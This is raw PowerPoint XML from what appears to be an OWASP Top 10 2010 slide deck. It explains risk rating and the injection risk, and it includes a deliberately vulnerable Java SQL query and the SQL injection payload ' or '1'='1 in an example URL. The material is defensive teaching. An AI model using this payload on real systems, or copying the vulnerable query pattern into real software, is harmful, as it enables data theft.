            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Risk?</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This update to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>OWASP Top 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP Risk Rating Methodology</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a: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However, only you know the specifics of your environment and your business. For any given application, there may not be a threat agent that can perform the relevant attack, or the technical impact may not make any difference. Therefore, you should evaluate each risk for yourself, focusing on the threat agents, security controls, and business impacts in your enterprise.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Although </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>previous versions of the OWASP Top 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> focused on identifying the most common “vulnerabilities”, they were also designed around risk. The names of the risks in the Top 10 stem from the type of attack, the type of weakness, or the type of impact they cause. We chose the name that is best known and will achieve the highest level of awareness.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="5105400"/>
            <a:ext cx="2286000" cy="403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endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="-57150">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7"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="-57150">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Risk Rating Methodology</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="-57150">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Article on Threat/Risk Modeling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="-57150">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="-57150">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="-57150">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7"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="-57150">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FAIR Information Risk Framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="-57150">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Microsoft Threat Modeling (STRIDE and DREAD)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 115"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2362201" y="2362196"/>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a:t>
              </a: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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 63"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="498475" y="2819400"/>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a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="AutoShape 163"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="2819400"/>
            <a:ext cx="838200" cy="357187"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrowCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 20889"/>
              <a:gd name="adj2" fmla="val 24667"/>
              <a:gd name="adj3" fmla="val 34667"/>
              <a:gd name="adj4" fmla="val 8013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41" name="Rectangle 89"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1354769" y="1981200"/>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Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPts val="800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vectors</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Rectangle 89"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2727423" y="1981200"/>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Weaknesses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Rectangle 89"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4621087" y="1981200"/>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Technical</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4" name="Rectangle 89"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5809634" y="1981200"/>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Business</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5" name="AutoShape 163"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="3248025"/>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59" name="AutoShape 142"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="2819400"/>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0" name="AutoShape 142"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="3276600"/>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1" name="AutoShape 85"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648200" y="3381345"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="AutoShape 85"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648200" y="2971800"/>
            <a:ext cx="685800" cy="428655"/>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Function</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="AutoShape 85"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648200" y="2581245"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Group 115"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2362201" y="2800350"/>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2997994"/>
            <a:ext cx="490729" cy="2116"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Rectangle 116"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3733800" y="2371725"/>
            <a:ext cx="4572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0" name="Rectangle 116"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3733799" y="2809875"/>
            <a:ext cx="4572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1" name="Rectangle 116"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3733800" y="3705225"/>
            <a:ext cx="457200" cy="381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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 115"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2362200" y="3695700"/>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2997994"/>
            <a:ext cx="490729" cy="440266"/>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561956"/>
            <a:ext cx="228600" cy="269"/>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000110"/>
            <a:ext cx="228599" cy="265"/>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552700"/>
            <a:ext cx="619125" cy="2382"/>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552700"/>
            <a:ext cx="381000" cy="242873"/>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562225"/>
            <a:ext cx="457200" cy="233348"/>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795573"/>
            <a:ext cx="457201" cy="204802"/>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552700"/>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186128"/>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2997994"/>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3895460"/>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552700"/>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1986078"/>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Controls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="123" name="Table 122"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="304800" y="6096000"/>
          <a:ext cx="4114799" cy="1051560"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1">
                <a:tableStyleId>{B301B821-A1FF-4177-AEE7-76D212191A09}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="609600"/>
                <a:gridCol w="723900"/>
                <a:gridCol w="723900"/>
                <a:gridCol w="723900"/>
                <a:gridCol w="723900"/>
                <a:gridCol w="609599"/>
              </a:tblGrid>
              <a:tr h="152400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Threat</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Agent</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>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900" dirty="0" smtClean="0"/>
                        <a:t>Attack</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Vector</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900" dirty="0" smtClean="0"/>
                        <a:t>Weakness Prevalence</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900" dirty="0" smtClean="0"/>
                        <a:t>Weakness </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0"/>
                        <a:t>Detectability</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900" dirty="0" smtClean="0"/>
                        <a:t>Technical Impact</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900" dirty="0" smtClean="0"/>
                        <a:t>Business Impact</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>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152400">
                <a:tc rowSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="0070C0"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>?</a:t>
                      </a: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900" dirty="0" smtClean="0"/>
                        <a:t>Easy</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n-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Widespread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n-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Easy</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n-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Severe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3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="0070C0"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>?</a:t>
                      </a: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r h="152400">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Average</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n-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Common</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n-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Average</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n-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Moderate</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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="152400">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Difficult</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n-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Uncommon</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n-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Difficult</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n-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Minor</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Title 62"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Application Security Risks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Text Placeholder 64"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Risk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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0" y="990600"/>
          <a:ext cx="8153400" cy="800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OWASP Top 10 Application Security Risks – 2010 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>T10</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57457"/>
          <a:ext cx="6858000" cy="2529546"/>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2743">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3569">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90563">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send </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>untrusted</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>data to the system,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> including external users, internal users, and administrators.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sends simple text-based attacks that exploit the syntax of the targeted interpreter. Almost any source of data can be an injection vector, including internal sources.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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Injection flaws</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> occur when an application sends </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>untrusted</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> data to an interpreter. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Injection flaws are very prevalent, particularly in legacy code, often found in SQL queries, LDAP queries, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>XPath</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> queries, OS commands, program arguments, etc. Injection flaws are easy to discover when examining code, but more difficult via testing. S</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>canners and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>fuzzers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> can help attackers find them.</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Injection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> can result in data loss or corruption, lack of accountability, or denial of access. Injection can sometimes lead to complete host takeover.</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and</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> the platform running the interpreter. All data could be stolen, modified, or deleted.  Could your reputation be harmed?</a:t>
                      </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> data in the construction of the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SQL call:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  String query = "SELECT * FROM accounts WHERE</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>custID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("id") +"'";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The attacker modifies the ‘id’ parameter in their browser to send: ' or '1'='1. This changes the meaning of the query to return all the records from the accounts database, instead of only the intended customer’s.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://example.com/app/accountView?id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' or '1'='1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
